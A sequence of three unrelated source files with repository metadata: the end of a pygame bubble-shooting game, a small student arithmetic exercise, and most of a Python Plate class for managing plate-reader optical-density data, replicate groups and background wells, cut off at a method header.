# print ("points : ", score)
pop_sound.play(0)
delete_bubble (bubble)
# Delete Bubble when it collides with the submarine
def delete_bubble (bubble):
del bubbles_state[bubble]
del bubbles_speed[bubble]
del bubbles_pos[bubble]
del bubbles_size[bubble]
# del bubbles_id[bubble]
# Remove bubbles who leave the screen
def clean_bubbles ():
for i in range (len(bubbles_pos) - 1, -1, -1) :
if (bubbles_pos[i][0] + bubbles_size[i] < 0) :
delete_bubble(i)
# Display colored text in position X and Y
def display_text(text, color, font, font_size, x, y):
myfont = pygame.font.SysFont(font, font_size, True)
message = myfont.render(text, True, color)
screen.blit(message, (x,y))
# Game Over Screen
def game_over_message():
pygame.mixer.stop()
lose_sound.play(0)
screen.fill(BLUE)
display_text("GAME OVER !", RED, 'Calibri', 40, WIDTH * 0.4, HEIGHT * 0.2 )
message = "Ton Score : " + str(score)
display_text(message, RED, 'Calibri', 40, WIDTH * 0.37, HEIGHT * 0.4 )
display_text("Appuie sur R pour rejouer !", WHITE, 'Calibri', 30, WIDTH * 0.33, HEIGHT * 0.6)
# Initialize game variables when restart
def init_game():
global score, x_sub, y_sub, game_end, bubbles_pos, bubbles_size, bubbles_speed, bubbles_state
game_end = time.time() + TIME_LIMIT
score = 0
x_sub = 40
y_sub = 250
# bubbles_id = list()
bubbles_pos = list()
bubbles_size = list()
bubbles_speed = list()
bubbles_state = list()
# Window Init
pygame.init()
# Display creation
screen = pygame.display.set_mode ((WIDTH, HEIGHT))
# Set the repetition rate of the key
pygame.key.set_repeat(1, 1)
# Window Name
pygame.display.set_caption("Bubble Blaster")
# The Background image
background_image = pygame.image.load("Ressources/ocean.jpg")
# The submarine
sub = pygame.image.load("Ressources/submarine.png")
# The bubble
blue_bubble = pygame.image.load("Ressources/blue_bubble.png")
bad_bubble = pygame.image.load("Ressources/red_bubble.png")
pop_sound = pygame.mixer.Sound("Ressources/collect.wav")
ambient_sound = pygame.mixer.Sound("Ressources/ambient_music.wav")
lose_sound = pygame.mixer.Sound("Ressources/lose.wav")
ambient_sound.set_volume(0.05)
#create_bubble()
# Main loop
while True:
pygame.mixer.stop()
ambient_sound.play(-1)
# Time loop
while time.time() < game_end:
# move_bubble()
update_game()
update_screen()
# Main event loop
for event in pygame.event.get() :
if event.type == pygame.QUIT:
leave_game()
sub_control()
game_over_message()
pygame.display.flip()
restart = False
while not restart:
# Event Manager Loop
for event in pygame.event.get() :
if event.type == pygame.QUIT:
leave_game()
if not hasattr (event, 'key'):
continue
if event.key == K_r:
restart = True
init_game()
## if event.key == K_ESCAPE:
## leave_game()
|
nicoseng/bubble_blaster
|
test.py
|
test.py
|
py
| 7,112 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9799846415
|
# CSC_120 Logbook : Pg 9, Exercise 4
# Start Program
# Variable declaration and initialization
v = 512
w = 282
x = 47.48
y = 5
# Calculation phase
z = (v - w) / (x + y)
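# With the values above: z = (512 - 282) / (47.48 + 5) = 230 / 52.48, approximately 4.3826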
# Outputs the result of the computation
print("The result of the computation is : ", z)
# End Program
|
Muhdal-Amin/CSC_120_pg9
|
compute/compute.py
|
compute.py
|
py
| 277 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20269902024
|
import os.path
import math
import numpy
import json
import bz2
import platereader
from platereader.replicate import Replicate
from platereader.statusmessage import StatusMessage, Severity
from platereader.csvunicode import CsvFileUnicodeWriter, CsvFileUnicodeReader
from platereader.parser import tecan, bioscreen
class Plate(object):
"""
Class containing the wells and holding plate-wide parameters.
"""
_parser2module = platereader.parser.modulenameToModule(
list(platereader.parser.getModulesOfNamespace(platereader.parser)),
replace='platereader.parser.',
lower=True)
_isNotPlateParameter={
'allowMaxGrowthrateAtLowerCutoff': True,
'allowGrowthyieldSlopeNStderrAwayFromZero': True,
}
def __init__(self,filename=None,fileformat=None,
time=None,rawOds=None,
sampleIds=None,conditions=None,wellids=None,plateId=None):
"""
Constructor.
If filename is not None and fileformat is None some heuristics
are used to identify the file format.
:param filename: name of serialised Plate or ascii file exported by the plate reader.
:type filename: str
        :param fileformat: string indicating the format (e.g. 'gat', 'tecan', 'bioscreen')
:type fileformat: str
:param time: array of timepoints when optical density was measured
:type time: numpy.array(float)
:param rawOds: list of optical density arrays
:type rawOds: list( numpy.array(float) )
:param sampleIds: list of sample names corresponding to the array of optical densities
:type sampleIds: list(str)
:param conditions: list of conditions under which the samples where grown
:type conditions: list(str)
:param plateId: name of this plate
:type plateId: str
"""
self.plateId=None
self._rawOd=None
self.wells=None
self.time=None
self.temperature=None
self.timeunit=None
self._inheritableParameters={}
# default parameters
self._inheritableParameters['maxGrowthLowerTimeCutoff']=None
self._inheritableParameters['maxGrowthUpperTimeCutoff']=None
self._inheritableParameters['allowMaxGrowthrateAtLowerCutoff']=False
self._inheritableParameters['allowGrowthyieldSlopeNStderrAwayFromZero']=1
# pure plate parameters
self._inheritableParameters['logOdCutoff']=None
self._inheritableParameters['lagAtLogOdEquals']=-5
self._inheritableParameters['slidingWindowSize']=10
self._inheritableParameters['hdCorrectionLinear']=None
self._inheritableParameters['hdCorrectionQuadratic']=None
self._inheritableParameters['hdCorrectionCubic']=None
self._inheritableParameters['smoothingK']=5
self._inheritableParameters['smoothingS']=0.01
self._loadStatus=StatusMessage()
self._capitaliseBackgroundIds=['blank','background']
self._clearMetadata()
if filename is not None:
if not os.path.exists(filename):
raise IOError("No such file or directory: '"+filename+"'")
if fileformat is None:
if filename.endswith('.gat'):
fileformat='gat'
else:
scorefileformat=[]
for fileformat in Plate._parser2module:
score=Plate._parser2module[fileformat].isPlateFormat(filename)
if score > 0.:
scorefileformat.append({'score': score, 'fileformat': fileformat})
scorefileformat = sorted(scorefileformat, key=lambda k: k['score'],reverse=True)
if not len(scorefileformat):
raise Plate.UnknownFileFormat(filename,detailedError='Cannot determine file format')
fileformat=scorefileformat[0]['fileformat']
if fileformat == 'gat':
self._load(filename)
elif fileformat in Plate._parser2module:
time, rawOd, sampleIds, conditions, plateId, temperature, wellids=Plate._parser2module[fileformat].parse(filename)
self._initFromArrays(time,rawOd,sampleIds,conditions,plateId=plateId,temperature=temperature,wellids=wellids)
else:
raise Plate.UnknownFileFormat(filename,serFormat=fileformat)
self.readfileformat=fileformat
elif rawOds is not None:
self._initFromArrays(time,rawOds,sampleIds,conditions,plateId=plateId,wellids=wellids)
else:
raise RuntimeError('could not construct Plate, neither filename nor arrays given')
self.modified=False
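    # Illustrative construction sketch (editor's addition; file names and arrays are hypothetical):
    #   plate = Plate('experiment.gat')                          # load a serialised plate
    #   plate = Plate('reader_export.asc', fileformat='tecan')   # parse a plate-reader export
    #   plate = Plate(time=time_in_seconds, rawOds=od_arrays,
    #                 sampleIds=ids, conditions=conds, plateId='plate 1')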
def _clearReplicateGroups(self):
if hasattr(self,'replicateGroups'):
for tc in self.replicateGroups:
# NOTE invalidating here so code holding references to these fails
tc._invalidate()
self.replicateGroups=None
self._backgroundGroupIndices=None
self._sampleConditionToReplicateGroupIdcs=None # an associative array mapping replicate groups by sample ID to a list of Replicate object indices
self._conditionToReplicateGroupIdx=None # an associative array mapping condition to a list of replicate group object indices
def _clearMetadata(self):
self._clearReplicateGroups()
self._setBackgroundForAllReplicates(None)
self._conditionToWellIdx=None # an associative array mapping condition to a list of Replicate objects
self._sampleConditionToWellIdcs=None # an associative array mapping wells (sample IDs) to a list of Replicate object indices
def _load(self,filename):
with bz2.BZ2File(filename, 'r') as rfile:
pickled=rfile.read().decode("utf-8")
try:
unpickled = json.loads(pickled)
except ValueError as err:
raise Plate.UnknownFileFormat(filename,detailedError=str(err))
return self._deserialise(unpickled,filename)
def _deserialise(self,unpickled,filename):
if 'format' not in unpickled:
raise Plate.UnknownFileFormat(filename,detailedError='no "format" keyword found in file')
serFormatVersion=unpickled['formatversion'] if 'formatversion' in unpickled else 'undefined'
if unpickled['format'] != 'opticaldensityplate' or serFormatVersion != '1':
raise Plate.UnknownFileFormat(filename,serFormat=unpickled['format'],serFormatVersion=serFormatVersion)
parkeys=[
# default parameters
'maxGrowthLowerTimeCutoff',
'maxGrowthUpperTimeCutoff',
'allowMaxGrowthrateAtLowerCutoff',
'allowGrowthyieldSlopeNStderrAwayFromZero',
# pure plate parameters
'logOdCutoff',
'lagAtLogOdEquals',
'slidingWindowSize',
'hdCorrectionLinear',
'hdCorrectionQuadratic',
'hdCorrectionCubic',
'smoothingK',
'smoothingS'
]
# reset these to make sure defaults given to constructor are not used for serialised plate
for par in self._inheritableParameters:
self._inheritableParameters[par]=None
self.plateId=unpickled['plateId']
self.time=numpy.array(unpickled['time'],dtype=float)
self.timeunit=unpickled['timeunit']
        # default parameters, some of which can be overridden by the individual replicates
for par in parkeys:
self._inheritableParameters[par]=unpickled[par]
if 'temperature' in unpickled:
self.temperature=numpy.array(unpickled['temperature'],dtype=float)
self._rawOd=[]
for lst in unpickled['rawOd']:
self._rawOd.append(numpy.array(lst,dtype=float))
self.wells=[]
for tcup in unpickled['wells']:
self.wells.append(Replicate(_unpickled=tcup,parentPlate=self,_serialiseFormat=unpickled['format']))
self.replicateGroups=[]
for tcup in unpickled['replicateGroup']:
comptc=Replicate(_unpickled=tcup,parentPlate=self,_serialiseFormat=unpickled['format'],isReplicateGroup=True)
self.replicateGroups.append(comptc)
# set parental replicate group of the children
for childtc in comptc.childWells():
childtc._setReplicateGroupParent(comptc)
# deferred to here: set the background index
for tc in self.wells:
if tc._tmp_backgroundIndex is not None:
tc._setBackgroundIndex(tc._tmp_backgroundIndex)
for tc in self.replicateGroups:
if tc._tmp_backgroundIndex is not None:
tc._setBackgroundIndex(tc._tmp_backgroundIndex)
# reset background indices, as these have been initialised
# before setting the replicate's backgrounds
self._backgroundWellIndices=None
self._backgroundGroupIndices=None
self._setBackgroundStatus()
def _serialise(self):
"""
Generates a dictionary of the plate data and parameters.
For internal use only.
"""
parkeys=[
# default parameters
'maxGrowthLowerTimeCutoff',
'maxGrowthUpperTimeCutoff',
'allowMaxGrowthrateAtLowerCutoff',
'allowGrowthyieldSlopeNStderrAwayFromZero',
# pure plate parameters
'logOdCutoff',
'lagAtLogOdEquals',
'slidingWindowSize',
'hdCorrectionLinear',
'hdCorrectionQuadratic',
'hdCorrectionCubic',
'smoothingK',
'smoothingS'
]
sr=dict()
sr["format"]='opticaldensityplate'
sr["formatversion"]='1' # this is an unsigned integer
sr['plateId']=self.plateId
sr['time']=self.time.tolist()
sr['timeunit']=self.timeunit
for key in parkeys:
sr[key]=self._inheritableParameters[key]
if self.temperature is not None:
sr['temperature']=self.temperature.tolist()
sr['rawOd']=[]
for raw in self._rawOd:
sr['rawOd'].append(raw.tolist())
sr['wells']=[]
for tc in self.wells:
sr['wells'].append(tc._serialise())
sr['replicateGroup']=[]
for tc in self.replicateGroups:
sr['replicateGroup'].append(tc._serialise())
return sr
def save(self,filename):
"""
Saves the plate content in a file.
:param filename: Name of the file.
:type filename: str
:return: StatusMessage/None -- non-fatal notifications.
"""
status=None
if not filename.endswith('.gat'):
root, ext = os.path.splitext(filename)
status=StatusMessage(
key='Saving file',shortmsg='wrongExtension',
                longmsg=('GATHODE uses a file extension that is different from "'+ext+'". '
+'This means that a future version of this program will not be able to open this file with the graphical user interface. '
                         +'Please save the file with the ".gat" extension.'),
severity=Severity.warning)
sr=self._serialise()
pickled = json.dumps(sr)
with bz2.BZ2File(filename, 'w') as wfile:
wfile.write(pickled.encode('utf-8'))
self.modified=False
return status
def _explicitlySetParsInChildWells(self,par):
"""
Explicitly set parameters in wells to their inherited values.
This can be used when replicate groups get removed
(e.g. setting new metadata) but the parameters should be
preserved. You most likely want to call
_reduceExplicitParameter once new replicate groups have been
created.
For internal use only.
"""
for tc in self.replicateGroups:
for child in tc.childWells():
# copy parameters from replicate group to the child
child._setExplicitParameter(par,child.getParameter(par))
def _reduceExplicitParameter(self,par):
"""
Sets the parameter par of self and wells such that it is shared by most of its children.
For internal use only.
:param par: the parameter for which a smaller set of values is created
:type par: string
"""
# check what could be the plate default for this parameter
parvals=Plate._getChildParvalOccurrence(self,par)
platedefault=Plate._chooseDefaultFromOccurrences(parvals)
        # set parameters in replicate groups; if one of a group's children has the same value
# as the platedefault use that one, otherwise try find another value for the group
for tc in self.replicateGroups:
Plate._reduceExplicitParametersHelper(tc,par,platedefault)
# now set the plate default (important: this has to be done *after* the Replicates are changed!)
Plate._reduceExplicitParametersHelper(self,par,platedefault)
return platedefault
@staticmethod
def _reduceExplicitParametersHelper(obj,par,parentdefault):
"""
Helper function for _reduceExplicitParameter
For internal use only.
        :param obj: the plate or replicate group whose children are examined
        :type obj: Plate/Replicate
        :param par: the parameter for which a smaller set of values is created
        :type par: string
Will be called with plate and Replicate objects.
"""
# gather occurrence of each value for this parameter in children
parvals=Plate._getChildParvalOccurrence(obj,par)
# the value that occurs most often will become the replicate group's value
newdefaultval=Plate._chooseDefaultFromOccurrences(parvals,parentdefault)
        # only if none of the children has the value None can we copy values up
if newdefaultval is None:
return
# delete consensus value from children
for child in Plate._getChildren(obj):
if newdefaultval == child.getParameter(par):
child._setExplicitParameter(par,None)
# set consensus value for replicate group parent
obj._setExplicitParameter(par,newdefaultval)
@staticmethod
def _getChildParvalOccurrence(obj,par):
"""
Return count of parameter values of all leaf children (at the lowest level of the hierarchy).
For internal use only.
:return: dict -- { value1: countValue1, value2: countValue2, ...}
"""
if isinstance(obj, Replicate) and not obj.isReplicateGroup():
# this is a single well
val=obj.getParameter(par)
return {val: 1}
else:
parvals={}
for child in Plate._getChildren(obj):
childparvals=Plate._getChildParvalOccurrence(child,par)
# assemble childrens' results into the main dictionary
for val in childparvals:
if val not in parvals:
parvals[val]=0
parvals[val]+=childparvals[val]
return parvals
@staticmethod
def _chooseDefaultFromOccurrences(parvals,parentdefault=None):
"""
Return the value of a parameter that occurs most often in leaf children.
For internal use only.
Can be called both without parentdefault (for the whole plate)
and with parentdefault (for ReplicateGroups).
:param parvals: output from _getChildParvalOccurrence
:type parvals: dict
        :return: float -- the most frequently occurring parameter value for this plate or ReplicateGroup
"""
if None in parvals:
return None
maxcnt=0
maxval=None
parvalkeys=list(parvals.keys())
parvalkeys.sort()
for val in parvalkeys:
# if there is a value corresponding to the plate default choose that one
if parentdefault is not None and val == parentdefault:
return parentdefault
# choose maximal occurring as default
if parvals[val] > maxcnt:
maxval=val
maxcnt=parvals[val]
return maxval
@staticmethod
def _getChildren(obj):
if isinstance(obj, Plate):
# this is a plate
return obj.replicateGroups
else:
# this is a replicate group
return obj.childWells()
@staticmethod
def capitaliseId(sampleId,capitaliseThese):
"""
Capitalise id if in given list.
:param sampleId: sample id; if this matches capitaliseThese it will be capitalised
:type sampleId: str
:param capitaliseThese: list of sample ids that correspond to samples that should be capitalised
:type capitaliseThese: list(str)
:return: str -- sample id (capitalised if it matches one of capitaliseThese)
"""
for bgid in capitaliseThese:
if sampleId.upper() == bgid.upper():
return bgid.upper()
return sampleId
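    # Example (editor's note): Plate.capitaliseId('blank', ['BLANK', 'BACKGROUND']) returns 'BLANK',
    # while ids that do not match the list are returned unchanged.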
def _initFromArrays(self,time,rawOd,sampleIds,conditions,plateId=None,temperature=None,wellids=None):
"""
Initialises a plate from numpy arrays.
For internal use only.
:param time: array of timepoints when optical density was measured
:type time: numpy.array(float)
:param rawOd: list of optical density arrays
:type rawOd: list( numpy.array(float) )
:param sampleIds: list of sample names corresponding to the array of optical densities
:type sampleIds: list(str)
:param conditions: list of conditions under which the samples where grown
:type conditions: list(str)
:param plateId: name of this plate
:type plateId: str
:param temperature: array of the temperature
        :type temperature: numpy.array(float)
:param wellids: array of ids for the wells (e.g. A1 to P24)
:type wellids: list(str)
"""
if len(rawOd) != len(sampleIds):
raise RuntimeError('number of raw optical density arrays is different from number of sample ids')
if len(sampleIds) != len(conditions):
raise RuntimeError('number of sample ids is different from number of conditions')
if wellids is not None and len(wellids) != len(set(wellids)):
raise RuntimeError('ids in wellids are not unique')
self.plateId=plateId
self.time=time/3600.
self.timeunit="h"
self._rawOd=rawOd
# make sure that background is correctly identified even if case is different
newSampleIds=[]
for sampleid in sampleIds:
newSampleIds.append(Plate.capitaliseId(sampleid,self._capitaliseBackgroundIds))
# create replicate objects for single wells from data (NOTE ids may exist multiple times, therefore this is not an associative array)
self.wells=[]
tcidx=0
for sampleid in newSampleIds:
wellid = [wellids[tcidx]] if wellids is not None else None
self.wells.append(Replicate(self,[tcidx],sampleid,conditions[tcidx],wellid))
# NOTE that on purpose this index is only increased for samples (not for time, temperature, ...)
tcidx+=1
self._createReplicateGroupsFromSampleIdsNConditions()
# use guessed background sampleIds to set background of single well and replicate groups
self._setBackgroundForAllReplicates(self._guessBackgroundSampleIds())
def wellMetadataOk(self,metadata):
"""
Check that the given metadata (i.e. sample id, growth condition) is valid and can be applied.
        This basically checks that there is the right number of
        metadata entries and that each contains a sample id and a condition.
:param metadata: array of metadata dictionaries
:type metadata: list(dict)
:return: bool, StatusMessage -- True if ok, False otherwise (and a StatusMessage with details)
"""
if len(metadata) != len(self.wells):
return False, StatusMessage(
key='Wrong metadata length:',shortmsg='metadata:wrongLength',
longmsg=('Number of metadata entries ('+str(len(metadata))+
') is different from number of wells '+str(len(self.wells))),
severity=Severity.failed)
idx=0
for metdat in metadata:
idx+=1
if len(metdat.keys()) != 2 or 'sample' not in metdat or 'condition' not in metdat:
thekeys='"'+('" "'.join(sorted(metdat.keys())))+'"' if len(metdat.keys()) else 'nothing'
return False, StatusMessage(
key='Wrong metadata elements:',shortmsg='metadata:wrongLength',
longmsg=('metadata for entry '+str(idx)+' contains '+thekeys+
', but should contain "condition" and "sample"'),
severity=Severity.failed)
return True, StatusMessage()
def setWellMetadata(self,metadata):
"""
Set the metadata (e.g. sample id, growth condition) of the wells.
:param metadata: array of metadata dictionaries
:type metadata: list(dict)
"""
metok, message = self.wellMetadataOk(metadata)
if not metok:
raise Plate.BadMetadata(str(message))
# propagate parameters to the wells before deleting replicate groups
for par in self.wells[0]._inheritableParameters.keys():
self._explicitlySetParsInChildWells(par)
# clear everything that depends on metadata
self._clearMetadata()
# set metadata of the wells
wellit=self.wells.__iter__()
for metdat in metadata:
metdat['sample']=Plate.capitaliseId(metdat['sample'],self._capitaliseBackgroundIds)
well=next(wellit)
well._setMetadata(metdat)
# create replicate groups based on sample ids and conditions
self._createReplicateGroupsFromSampleIdsNConditions()
# use guessed background sampleIds to set background of single well and replicate groups
self._setBackgroundForAllReplicates(self._guessBackgroundSampleIds())
# propagate parameters from the wells to the replicate groups (or plate) if possible
for par in self.wells[0]._inheritableParameters.keys():
self._reduceExplicitParameter(par)
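    # Example metadata layout (editor's sketch; sample ids and conditions are hypothetical):
    #   metadata = [{'sample': 'WT',    'condition': 'glucose'},
    #               {'sample': 'BLANK', 'condition': 'glucose'},
    #               ...]                  # one dict per well, in well order
    #   plate.setWellMetadata(metadata)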
def wellMetadata(self):
"""
Return the metadata of the wells.
:return: list(dict) -- metadata
"""
metadata=[]
for well in self.wells:
metadata.append(well._getMetadata())
return metadata
def _setupBackgroundIndices(self):
"""
Set self._backgroundGroupIndices and self._backgroundWellIndices.
Records the indices of tc.background (which are rpelicate
groups) for all wells and replicateGroups and also the indices
of the underlying background wells.
For internal use only.
"""
self._backgroundGroupIndices=set()
self._backgroundWellIndices=set()
if self.wells:
for tc in self.wells:
if tc.background:
self._backgroundGroupIndices.add(self._indexOfReplicateGroup(tc.background))
if self.replicateGroups:
for tc in self.replicateGroups:
if tc.background:
self._backgroundGroupIndices.add(self._indexOfReplicateGroup(tc.background))
for idx in self._backgroundGroupIndices:
for chldidx in self.replicateGroups[idx].childWellIndices():
self._backgroundWellIndices.add(chldidx)
def _guessBackgroundSampleIds(self):
"""
Guess sample ids of background wells ("BLANK" or "BACKGROUND")
For internal use only.
"""
backgroundKeys={}
for tc in self.wells:
if tc.sampleid == "BLANK" or tc.sampleid == "BACKGROUND":
backgroundKeys[tc.sampleid]=1
backgroundSampleIds=sorted(list(backgroundKeys.keys()))
return backgroundSampleIds
def _setBackgroundStatus(self):
"""
Add conditions/samples for which no background was found to self._loadStatus
This should be called when the background was set for some wells/replicate groups.
For internal use only.
"""
self._loadStatus.removeStatusesWithKey('No background samples:')
self._loadStatus.removeStatusesWithKey('No background for some samples:')
backgroundSampleIds=set()
for idx in self.backgroundReplicateGroupIndices():
backgroundSampleIds.add(self.replicateGroups[idx].sampleid)
for idx in self.backgroundWellIndices():
backgroundSampleIds.add(self.wells[idx].sampleid)
if len(backgroundSampleIds) < 1:
self._loadStatus.addStatus(
StatusMessage(
key='No background samples:',shortmsg='plateinit:noBackground',
longmsg=('No background (blank) wells could be identified.'+
' This means no growth parameters will be extracted'),
severity=Severity.warning)
)
return
noBackground={}
for tc in self.nonBackgroundWells():
if tc.background is None:
if tc.condition not in noBackground:
noBackground[tc.condition]={}
if tc.sampleid not in noBackground[tc.condition]:
noBackground[tc.condition][tc.sampleid]=[]
noBackground[tc.condition][tc.sampleid].append(tc)
for tc in self.nonBackgroundReplicates():
if tc.background is None:
if tc.condition not in noBackground:
noBackground[tc.condition]={}
if tc.sampleid not in noBackground[tc.condition]:
noBackground[tc.condition][tc.sampleid]=[]
noBackground[tc.condition][tc.sampleid].append(tc)
if len(noBackground.keys()):
affected=''
for condition in sorted(noBackground):
if condition is None or condition == '':
affected+='no condition:'
else:
affected+=condition+':'
for sampleid in sorted(noBackground[condition]):
affected+=' '+sampleid
affected+='\n'
self._loadStatus.addStatus(
StatusMessage(
key='No background for some samples:',shortmsg='plateinit:noBackgroundForSomeSamples',
longmsg=('For some conditions no background (blank) could be identified.'+
' This means no growth parameters will be extracted. The affected samples are:\n'+
affected),
severity=Severity.warning)
)
def backgroundReplicateGroupIndices(self):
"""
Return indices into self.replicateGroups for replicate groups being listed as background.
:return: list(int) -- indices of background replicate groups
"""
if self._backgroundGroupIndices is None:
self._setupBackgroundIndices()
return self._backgroundGroupIndices
def backgroundReplicateGroups(self):
"""
Return replicate groups being listed as background.
:return: list(Replicate) -- replicate groups listed as background
"""
tcs=[]
for idx in self.backgroundReplicateGroupIndices():
tcs.append(self.replicateGroups[idx])
return tcs
def backgroundWellIndices(self):
"""
Return indices into self.wells for wells being listed as background.
:return: list(int) -- indices of background wells
"""
if self._backgroundWellIndices is None:
self._setupBackgroundIndices()
return self._backgroundWellIndices
def backgroundWells(self):
"""
Return wells being listed as background.
:return: list(Replicate) -- wells listed as background
"""
tcs=[]
for idx in self.backgroundWellIndices():
tcs.append(self.wells[idx])
return tcs
def _createSampleConditionToWellIndices(self):
"""
Create a mapping to quickly find single-well objects based on sample id and condition.
For internal use only.
"""
# gather sampleids and conditions
self._conditionToWellIdx={}
self._sampleConditionToWellIdcs={}
tcidx=0
for tc in self.wells:
# add well to the condition mapping
if tc.condition not in self._conditionToWellIdx:
self._conditionToWellIdx[tc.condition]=[]
self._conditionToWellIdx[tc.condition].append(tcidx)
# add well to the replicate mapping (sampleid and condition)
if tc.sampleid not in self._sampleConditionToWellIdcs:
self._sampleConditionToWellIdcs[tc.sampleid]={}
if tc.condition not in self._sampleConditionToWellIdcs[tc.sampleid]:
self._sampleConditionToWellIdcs[tc.sampleid][tc.condition]=[]
self._sampleConditionToWellIdcs[tc.sampleid][tc.condition].append(tcidx)
tcidx+=1
def _createReplicateGroupsFromSampleIdsNConditions(self):
"""
Create replicate groups by grouping wells of the same sample id and condition.
For internal use only.
"""
if self._sampleConditionToWellIdcs is None:
self._createSampleConditionToWellIndices()
sampleids=list(self._sampleConditionToWellIdcs.keys())
sampleids.sort()
self.replicateGroups=[]
for sampleid in sampleids:
conditions=list(self._sampleConditionToWellIdcs[sampleid].keys())
conditions.sort()
for condition in conditions:
comptc=Replicate(self,self._sampleConditionToWellIdcs[sampleid][condition],
None,condition,isReplicateGroup=True)
self.replicateGroups.append(comptc)
# set parental replicate group of the children
for childtc in comptc.childWells():
childtc._setReplicateGroupParent(comptc)
def _createSampleConditionToReplicateGroupIndices(self):
"""
Create a mapping to quickly find replicate groups based on sample id and condition.
For internal use only.
"""
self._sampleConditionToReplicateGroupIdcs={}
coidx=0
for tc in self.replicateGroups:
if tc.sampleid not in self._sampleConditionToReplicateGroupIdcs:
self._sampleConditionToReplicateGroupIdcs[tc.sampleid]={}
if tc.condition not in self._sampleConditionToReplicateGroupIdcs[tc.sampleid]:
self._sampleConditionToReplicateGroupIdcs[tc.sampleid][tc.condition]=[]
self._sampleConditionToReplicateGroupIdcs[tc.sampleid][tc.condition].append(coidx)
coidx+=1
def _createConditionToReplicateGroupIndices(self):
"""
Create a mapping to quickly find all replicate groups for a specific condition.
For internal use only.
"""
self._conditionToReplicateGroupIdx={}
coidx=0
for tc in self.replicateGroups:
# add replicate group to the condition mapping
if tc.condition not in self._conditionToReplicateGroupIdx:
self._conditionToReplicateGroupIdx[tc.condition]=[]
self._conditionToReplicateGroupIdx[tc.condition].append(coidx)
coidx+=1
def _setBackgroundForAllReplicates(self,backgroundSampleIds):
"""
Set background replicate group for single-wells and replicate groups.
Currently, if there are multiple background ids, an exception is raised.
For internal use only.
"""
self._backgroundWellIndices=None
self._backgroundGroupIndices=None
if backgroundSampleIds is None or not len(backgroundSampleIds):
if self.wells is not None:
for tc in self.wells:
tc._setBackgroundIndex(None)
if self.replicateGroups is not None:
for tc in self.replicateGroups:
tc._setBackgroundIndex(None)
self._setBackgroundStatus()
return
if len(backgroundSampleIds) > 1:
raise Plate.MultipleBackgroundIdsError(backgroundSampleIds)
backgroundSampleId=backgroundSampleIds[0]
if self._sampleConditionToReplicateGroupIdcs is None:
self._createSampleConditionToReplicateGroupIndices()
# set background index for the single (non-averaged) wells
for tc in self.wells:
if tc.sampleid not in backgroundSampleIds:
if tc.condition in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId]:
# NOTE there should be only one element in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition]
tc._setBackgroundIndex(self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition][0])
# set background for replicate groups
for tc in self.replicateGroups:
if tc.sampleid not in backgroundSampleIds:
if tc.condition in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId]:
# NOTE there should be only one element in self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition]
tc._setBackgroundIndex(self._sampleConditionToReplicateGroupIdcs[backgroundSampleId][tc.condition][0])
# append warnings to self._loadStatus if for some replicates no background was set
self._setBackgroundStatus()
def replicateGroupIdxForSampleCondition(self,sampleid,condition):
"""
Return index of replicate group with the given sample Id and condition.
:param sampleid: Id of the sample.
:type sampleid: string
:param condition: Condition under which the sample was grown.
:type condition: string
:return: int -- Index (into self.replicateGroups) of Replicate with given id and condition.
"""
if self._sampleConditionToReplicateGroupIdcs is None:
self._createSampleConditionToReplicateGroupIndices()
if sampleid not in self._sampleConditionToReplicateGroupIdcs:
return None
if condition not in self._sampleConditionToReplicateGroupIdcs[sampleid]:
return None
if len(self._sampleConditionToReplicateGroupIdcs[sampleid][condition]) != 1:
raise RuntimeError('more than one replicate group for '+sampleid+' '+condition)
return self._sampleConditionToReplicateGroupIdcs[sampleid][condition][0]
def replicateGroupForSampleCondition(self,sampleid,condition):
"""
        Return the replicate group with the given sample Id and condition.
:param sampleid: Id of the sample.
:type sampleid: string
:param condition: Condition under which the sample was grown.
:type condition: string
:return: Replicate -- replicate group with given id and condition.
"""
idx=self.replicateGroupIdxForSampleCondition(sampleid,condition)
if idx is None:
return None
return self.replicateGroups[idx]
def replicateGroupIdcsForCondition(self,condition):
"""
Return a list of indices of replicate groups with the given condition.
:param condition: Condition under which the samples were grown.
:type condition: string
:return: list(int) -- Indices (into self.replicateGroups) of replicate groups with the given condition.
"""
if self._conditionToReplicateGroupIdx is None:
self._createConditionToReplicateGroupIndices()
if condition not in self._conditionToReplicateGroupIdx:
return None
return self._conditionToReplicateGroupIdx[condition]
def replicateGroupsForCondition(self,condition):
"""
Return a list of replicate groups with the given condition.
:param condition: Condition under which the samples were grown.
:type condition: string
:return: list(Replicate) -- Replicate groups with given condition.
"""
idcs=self.replicateGroupIdcsForCondition(condition)
if idcs is None:
return None
tcs=[]
for idx in idcs:
tcs.append(self.replicateGroups[idx])
return tcs
def conditions(self):
"""
Return a list of conditions.
:return: list(str) -- Conditions.
"""
if self._conditionToReplicateGroupIdx is None:
self._createConditionToReplicateGroupIndices()
conditions=list(self._conditionToReplicateGroupIdx.keys())
conditions.sort()
return conditions
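    # Illustrative query sketch (editor's addition):
    #   for cond in plate.conditions():
    #       for group in plate.replicateGroupsForCondition(cond):
    #           print(cond, group.sampleid)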
def nonBackgroundReplicates(self):
"""
:return: list(Replicate) -- replicate groups that are not background samples.
"""
backgroundIndices=self.backgroundReplicateGroupIndices()
nbckg=[]
idx=0
for tc in self.replicateGroups:
if idx not in backgroundIndices:
nbckg.append(tc)
idx+=1
return nbckg
def nonBackgroundReplicateIndices(self):
"""
        :return: list(int) -- Indices of replicate groups that are not background samples.
"""
backgroundIndices=self.backgroundReplicateGroupIndices()
nbckgidcs=[]
idx=0
for tc in self.replicateGroups:
if idx not in backgroundIndices:
nbckgidcs.append(idx)
idx+=1
return nbckgidcs
def nonBackgroundWells(self):
"""
:return: list(Replicate) -- wells that are not background samples.
"""
backgroundIndices=self.backgroundWellIndices()
nbckg=[]
idx=0
for tc in self.wells:
if idx not in backgroundIndices:
nbckg.append(tc)
idx+=1
return nbckg
def _indexOfReplicateGroup(self,ctc):
"""
Determine the index of the given replicate group.
For internal use only.
:return: int -- Index of replicate group.
"""
if self.replicateGroups is None:
return None
idx=0
idxOfTc=None
for ttc in self.replicateGroups:
if ttc._wellIndices == ctc._wellIndices:
if idxOfTc is not None:
raise RuntimeError("multiple similar replicate groups?")
else:
idxOfTc=idx
idx+=1
return idxOfTc
def _parametersUpdated(self,par=None):
